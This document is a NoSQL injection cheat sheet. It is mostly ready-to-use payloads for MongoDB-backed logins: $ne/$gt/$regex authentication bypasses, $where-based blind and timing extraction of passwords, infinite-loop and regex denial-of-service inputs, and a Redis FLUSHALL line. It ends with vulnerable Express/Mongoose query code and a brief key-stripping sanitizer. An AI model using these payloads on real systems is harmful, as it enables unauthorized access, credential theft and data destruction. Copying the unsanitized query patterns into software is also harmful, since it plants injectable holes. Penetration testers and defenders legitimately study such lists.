NoSQL Injection Payloads

$eq - Equal
$ne - Not equal
$gt - Greater than
$gte - Greater than or equal
$lt - Less than
$lte - Less than or equal
$in - In array
$nin - Not in array
$regex - Regular expression
$where - JavaScript expression
$or - Logical OR
$and - Logical AND

{"username": "admin", "password": {"$ne": null}}
{"username": "admin", "password": {"$ne": ""}}
{"username": "admin", "password": {"$ne": "randomstring"}}
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "nonexistent"}, "password": {"$ne": "nonexistent"}}

username=admin&password[$ne]=randomstring
username[$ne]=&password[$ne]=
username[$ne]=nonexistent&password[$ne]=nonexistent

{"username": "admin", "password": {"$gt": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}

username=admin&password[$gt]=
username[$gt]=&password[$gt]=

{"username": {"$regex": "admin.*"}, "password": {"$ne": ""}}
{"username": {"$regex": "^admin"}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}

username[$regex]=admin.*&password[$ne]=
username[$regex]=^admin&password[$gt]=

{"$or": [{"username": "admin"}, {"password": "any"}]}
{"$or": [{"username": {"$ne": ""}}, {"password": {"$ne": ""}}]}

{"username": {"$in": ["admin", "administrator", "root"]}, "password": {"$ne": ""}}
{"username": "admin", "password": {"$in": ["", "password", "admin", "123456"]}}

{"username": "admin", "$where": "this.password.length > 0"}
{"username": "admin", "$where": "this.password.match(/^a.*/i)"}
{"username": "admin", "$where": "this.password[0] == 'a'"}

{"$where": "sleep(5000)"}
{"$where": "if (this.username == 'admin') { sleep(5000); return true; }"}
{"username": "admin", "$where": "if (this.password[0] == 'a') { sleep(5000); return true; }"}

{"username": "admin", "$where": "this.password.startsWith('a')"}
{"username": "admin", "$where": "this.password.substring(0,1) == 'a'"}
{"username": "admin", "$where": "this.password.length == 8"}

{"$where": "this.username == 'admin' || '1'=='1'"}
{"$where": "1==1"}
{"$where": "return true"}

{"$where": "var date=new Date(); do{curDate = new Date();}while(curDate-date<10000); return true;"}
{"$where": "sleep(5000) || true"}

{"$where": "this.password.charAt(0) == 'a'"}
{"$where": "this.password.charCodeAt(0) == 97"}
{"$where": "this.password.substr(0,1) == 'a'"}

{"username": {"$regex": "^.{1}$"}, "password": {"$ne": ""}}
{"username": {"$regex": "^.{5}$"}, "password": {"$ne": ""}}
{"username": {"$regex": "^admin$"}, "password": {"$ne": ""}}

{"username": {"$regex": "^a"}, "password": {"$ne": ""}}
{"username": {"$regex": "^ad"}, "password": {"$ne": ""}}
{"username": {"$regex": "^adm"}, "password": {"$ne": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}

{"username": "admin", "$where": "this.password.startsWith('a')"}
{"username": "admin", "$where": "this.password.startsWith('ab')"}
{"username": "admin", "$where": "this.password.startsWith('abc')"}

{"selector": {"_id": {"$gt": null}}}
{"selector": {"username": "admin", "password": {"$gt": ""}}}

# Command injection if user input is used in commands
*
*1
FLUSHALL
GET *

' OR '1'='1
' OR username='admin'--

query {
  user(username: "admin", password: {$ne: ""}) {
    id
    username
    email
  }
}

POST /api/login
{
  "username": "admin",
  "password": {"$ne": ""}
}

{"username": ["admin"], "password": ["password"]}
{"username": {"$in": ["admin", "root"]}, "password": {"$ne": ""}}

{"username": "admin", "password": true}
{"username": "admin", "password": {"$type": 2}}

{"$where": "while(true){}"}
{"$where": "sleep(999999)"}
{"username": {"$regex": "^.*(.*)(.*)(.*)(.*)(.*)(.*)(.*)(.*)(.*)$"}}

const user = await User.findOne({
  username: req.body.username,
  password: req.body.password
});

{
  "username": "admin",
  "password": {"$ne": ""}
}

const query = {
  username: req.params.username,
  ...req.query
};
const user = await User.findOne(query);

GET /api/user/admin?password[$regex]=^a
GET /api/user/admin?password[$regex]=^ab

const users = await User.find({
  $where: `this.username === '${req.body.username}'`
});

{
  "username": "admin' || '1'=='1"
}

function sanitize(input) {
  if (typeof input !== 'object') return input;

  for (let key in input) {
    if (key.startsWith('$')) {
      delete input[key];
    }
  }
  return input;
}

// Usage
const username = sanitize(req.body.username);
const password = sanitize(req.body.password);

const userSchema = new mongoose.Schema({
  username: { type: String, required: true },
  password: { type: String, required: true }
});